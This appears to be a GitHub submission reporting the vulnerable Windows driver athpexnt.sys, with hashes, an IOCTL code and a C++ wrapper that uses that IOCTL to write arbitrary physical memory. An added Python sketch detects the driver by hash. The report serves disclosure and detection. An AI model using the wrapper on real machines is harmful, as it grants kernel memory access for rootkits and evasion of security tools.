Add vulnerable driver athpexnt.sys #255

@krispybyte

Driver name: athpexnt.sys
Device name: \\.\ATHpEx
SHA256: fa0902daefbd9e716faaac8e854144ea0573e2a41192796f3b3138fe7a1d19f1
MD5: bf77a19e1396d6d36e32ff8d23eb5d3f

Allows any user to use an IOCTL to input a source virtual address, destination virtual address and size; the addresses are then translated and physical memory is copied.

Vulnerable function IOCTL Code: 0x81000000

Example usage:

class MemoryWriteIoctlPacket
{
private:
	std::uint64_t Destination;
	std::uint64_t Source;
	std::uint32_t Size;
public:
	MemoryWriteIoctlPacket(const std::uint64_t Dest, const std::uint64_t Src, const std::uint32_t Size)
		: Destination(Dest), Source(Src), Size(Size) { }
};

bool Driver::Athpexnt::WritePhysicalMemory(const void* To, const void* From, const std::uint32_t Size) const
{
    const MemoryWriteIoctlPacket IoctlPacketData(
        reinterpret_cast<std::uint64_t>(To),
        reinterpret_cast<std::uint64_t>(From),
        Size
    );

    std::uint32_t BytesReturned = 0;
    if (!DeviceIoControl(this->DriverHandle,
        0x81000000,
        const_cast<LPVOID>(reinterpret_cast<const void*>(&IoctlPacketData)),
        sizeof(MemoryWriteIoctlPacket),
        nullptr,
        NULL,
        reinterpret_cast<LPDWORD>(&BytesReturned),
        NULL
    ))
    {
        return false;
    }

    return true;
}
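
Added example, not part of the original report or the project's own code: a detection sketch that matches the hashes listed above against Sysmon driver-load events (event ID 6) and against `.sys` files on disk, so a renamed copy of the driver is still caught. The sample events are constructed, and the function names are hypothetical.

```python
import hashlib
from pathlib import Path

# Hashes copied from the report above.
BLOCKED_SHA256 = "fa0902daefbd9e716faaac8e854144ea0573e2a41192796f3b3138fe7a1d19f1"
BLOCKED_MD5 = "bf77a19e1396d6d36e32ff8d23eb5d3f"

def parse_hashes(field):
    """Turn a Sysmon 'Hashes' value ('MD5=..,SHA256=..') into a lowercase dict."""
    pairs = (item.split("=", 1) for item in field.split(",") if "=" in item)
    return {k.strip().upper(): v.strip().lower() for k, v in pairs}

def flag_driver_loads(events):
    """Return events whose hash matches the report, whatever the file is called."""
    hits = []
    for ev in events:
        h = parse_hashes(ev.get("Hashes", ""))
        if h.get("SHA256") == BLOCKED_SHA256 or h.get("MD5") == BLOCKED_MD5:
            hits.append(ev)
    return hits

def scan_directory(root):
    """Hash every *.sys file under root and return paths matching the SHA256."""
    matches = []
    for path in Path(root).rglob("*.sys"):
        try:
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
        except OSError:
            continue  # locked or unreadable file: skip, do not abort the sweep
        if digest == BLOCKED_SHA256:
            matches.append(path)
    return matches

# Constructed sample events (not real telemetry); field names follow Sysmon event ID 6.
SAMPLE_EVENTS = [
    {"ImageLoaded": r"C:\Windows\System32\drivers\athpexnt.sys",
     "Hashes": f"MD5={BLOCKED_MD5.upper()},SHA256={BLOCKED_SHA256.upper()}"},
    {"ImageLoaded": r"C:\Users\Public\renamed.sys",
     "Hashes": f"SHA256={BLOCKED_SHA256}"},
    {"ImageLoaded": r"C:\Windows\System32\drivers\example.sys",
     "Hashes": "SHA256=" + "0" * 64},
]

if __name__ == "__main__":
    for ev in flag_driver_loads(SAMPLE_EVENTS):
        print("blocked driver load:", ev["ImageLoaded"])
    print("on disk:", scan_directory(r"C:\Windows\System32\drivers"))
```

Matching on the hash rather than the file name is what catches the second sample event, where the same binary is loaded from a different path under a different name.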
